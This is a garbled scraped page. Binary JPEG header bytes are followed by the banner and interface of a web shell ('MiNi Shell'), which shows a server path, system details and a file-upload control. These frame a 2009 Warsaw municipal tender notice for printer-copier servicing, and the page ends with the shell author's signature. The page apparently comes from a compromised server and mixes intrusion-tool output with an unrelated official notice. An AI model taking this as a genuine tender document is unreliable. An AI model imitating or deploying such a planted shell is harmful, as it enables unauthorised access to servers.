JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090212/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090212/37121-N-2009.html

<p class="kh_header"><b>Warszawa: Usługi serwisowania urządzeń drukująco - kopiujących</b><br>
<b>Numer ogłoszenia: 37121 - 2009; data zamieszczenia: 12.02.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Obsługi Urzędu m.st. Warszawy , ul. Miodowa 6/8, 00-251 Warszawa, woj. mazowieckie, tel. 022 5953613, faks 022 5953496.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi serwisowania urządzeń drukująco - kopiujących.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest serwisowanie pięciu drukarko-kopiarek znajdujących się w siedzibie Urzędu m.st. Warszawy przy 
ul. Senatorskiej 36 (powielarnia), w tym:
a) czterech wysokonakładowych, czarno-białych drukarko-kopiarek Oce Vario Print 2110, o numerach seryjnych 1548, 1550, 496 i 497;
b) jednej wielofunkcyjnej wysokonakładowej, kolorowej drukarko-kopiarki Oce CPS 800, o numerze seryjnym 5271.

Warunki realizacji zamówienia:
1) Wykonawca zobowiązuje się do utrzymania bieżącej sprawności technicznej drukarko-kopiarek będących przedmiotem niniejszego zamówienia. 
2) Wykonywanie bieżącej konserwacji następować będzie na podstawie wezwania przez Zamawiającego lub z inicjatywy Wykonawcy. 
3) Zamawiający wezwie Wykonawcę w przypadku stwierdzenia nieprawidłowości w pracy urządzenia, pogorszenia się jakości wykonywanych odbitek itp. 
4) Wykonawca z własnej inicjatywy podejmie czynności konserwacyjne w przypadkach przewidzianych przez producenta urządzenia w instrukcji obsługi i dokumentacji technicznej, z którymi Wykonawca musi się zapoznać i na tej podstawie zaplanować czynności.
5) W ramach konserwacji kserokopiarek Wykonawca będzie wykonywał, co najmniej następujące czynności:
a) czyszczenie i przegląd układu optyki,
b) czyszczenie i przegląd układu grzejnego,
c) czyszczenie i przegląd układu przenoszenia obrazu,
d) czyszczenie i przegląd układu pobierania papieru,
e) czyszczenie i przegląd podajnika dokumentów,
f) czyszczenie i przegląd kaset dużej pojemności,
g) czyszczenie, przegląd i regulacja wszystkich układów sorterów lub finiszerów,
h) regulacja jakości obrazu,
i) regulacja podawania papieru w automatycznych podajnikach,
j) konserwacja obudowy.
6) Przystąpienie do wykonywania bieżącej konserwacji na wezwanie Zamawiającego musi nastąpić nie później niż następnego dnia roboczego po dniu, w którym dokonano wezwania. W przypadku wykonywania bieżącej konserwacji z inicjatywy Wykonawcy, termin podjęcia czynności będzie uzgadniany każdorazowo z Zamawiającym. Przez dni robocze rozumie się dni od poniedziałku do piątku z wyłączeniem dni ustawowo wolnych od pracy.
7) W ramach usługi Wykonawca zobowiązany jest do wykonywania przeglądów technicznych, które następować będą na podstawie wezwanie przez Zamawiającego lub z inicjatywy Wykonawcy. 
8) Zamawiający wezwie Wykonawcę w przypadku stwierdzenia konieczności wykonania przeglądu technicznego. 
9) Wykonawca z własnej inicjatywy wykona przegląd techniczny w przypadkach przewidzianych przez producenta urządzenia w instrukcji obsługi i dokumentacji technicznej, z którymi Wykonawca musi się zapoznać i na tej podstawie zaplanować odpowiednie czynności.
10) W ramach przeglądów technicznych Wykonawca będzie wykonywał następujące czynności:
a) wykonanie czynności serwisowych, zgodnie z zaleceniami producenta zawartymi 
w instrukcji obsługi i dokumentacji technicznej,
b) wymiana części przewidzianych do wymiany przy danym przeglądzie technicznym lub zużytych, zgodnie z zaleceniami producenta zawartymi w instrukcji obsługi i dokumentacji technicznej.
11) Przystąpienie do wykonywania przeglądu technicznego na wezwanie Zamawiającego musi nastąpić nie później niż następnego dnia roboczego od dnia, w którym dokonano wezwania. Jeżeli Wykonawca nie zakończy przeglądu do końca drugiego dnia roboczego od dnia wezwania lub bezpośrednio po przystąpieniu do czynności przeglądowych przewiduje dłuższy czas wyłączenia urządzenia, dostarczy takie samo urządzenie zastępcze do czasu uruchomienia drukarko-kopiarki. W przypadku wykonywania przeglądu technicznego z inicjatywy Wykonawcy, uzgodni on termin podjęcia czynności z Zamawiającym.
12) Wykonawca zapewnia Zamawiającemu wsparcie techniczne hot-line w godzinach pracy Zamawiającego (poniedziałek - piątek w godzinach 8.00-16.00).
13) Wykonawca nie może powierzyć wykonania przedmiotu umowy osobom trzecim.

Wymagania wobec Wykonawcy
1) Świadczenie usług stanowiących przedmiot zamówienia może odbywać się jedynie przez Wykonawcę posiadającego autoryzację producenta na świadczenie przedmiotowych usług.
2) Wykonawca przedstawi wykaz usług realizowanych w ostatnich trzech latach, 
w zakresie stanowiącym przedmiot zamówienia oraz załączy dokumenty to potwierdzające min. 3.

Cena oraz wartość usługi
1) Cena jednostkowa usługi obejmuje wszystkie czynności konserwacyjne oraz przeglądy techniczne, jak również dostawę i wymianę materiałów eksploatacyjnych oraz części zamiennych, jak również dojazdy serwisantów i inne czynności mające wpływ na właściwą realizację usługi. 
2) Wartość zamówienia będzie stanowić iloczyn ilości kopii wykonanych przez drukarko - kopiarki oraz ceny za wykonanie 100 kopii.
3) Zamawiający przyjmuje wykonanie dwóch milionów kopii czarnobiałych na wszystkich czterech maszynach oraz wykonanie trzydziestu tysięcy kopii na maszynie kolorowej..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 50.31.31.00-3, 50.31.32.00-4.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Nie jest wymagane<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. W postępowaniu mogą brać udział Wykonawcy, którzy spełniają warunki określone w art. 22 ust.1 pkt 1-4  Ustawy tj.:
1) posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień; 
2) posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia; 
3) znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
4) nie podlegają wykluczeniu z postępowania o udzielenie zamówienia publicznego.

2. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia publicznego albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. 
3. Jeżeli oferta Wykonawców, o których mowa w Rozdziale V pkt 2 SIWZ w przedmiotowym postępowaniu, zostanie wybrana Zamawiający będzie żądał przed zawarciem umowy w sprawie zamówienia publicznego, umowy regulującej współpracę tych Wykonawców.
4. Ocena spełnienia powyższych warunków będzie prowadzona na podstawie treści złożonych przez Wykonawcę dokumentów i oświadczeń, wymaganych zgodnie 
z Rozporządzeniem Prezesa Rady Ministrów z dnia 19 maja 2006 r. w sprawie rodzaju dokumentów, jakich może żądać zamawiający od wykonawcy oraz form w jakich te dokumenty mogą być składane (Dz.U. z 2006 r. Nr 87, poz. 605 z późn. zm.)..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1) Oświadczenie o spełnieniu wymogów określonych w art. 22 ust. 1 Ustawy 
- wg wzoru określonego w załączniku nr 2 do SIWZ;
2) Autoryzację producenta na świadczenie usług będących przedmiotem zamówienia w niniejszym postępowaniu;
3) Dokument potwierdzający dopuszczenie Wykonawcy do obrotu prawnego 
w zakresie objętym zamówieniem - aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
4) Wykaz usług realizowanych w ostatnich trzech latach, w zakresie stanowiącym przedmiot zamówienia wraz z minimum 3 dokumentami to potwierdzającymi..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.um.warszawa.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> ul. Miodowa 6/8, 00-251 Warszawa, pok. 204 (II piętro).</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.02.2009 godzina 09:45, miejsce: ul. Miodowa 6/8, 00-251 Warszawa, pok. 204 (II piętro).</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com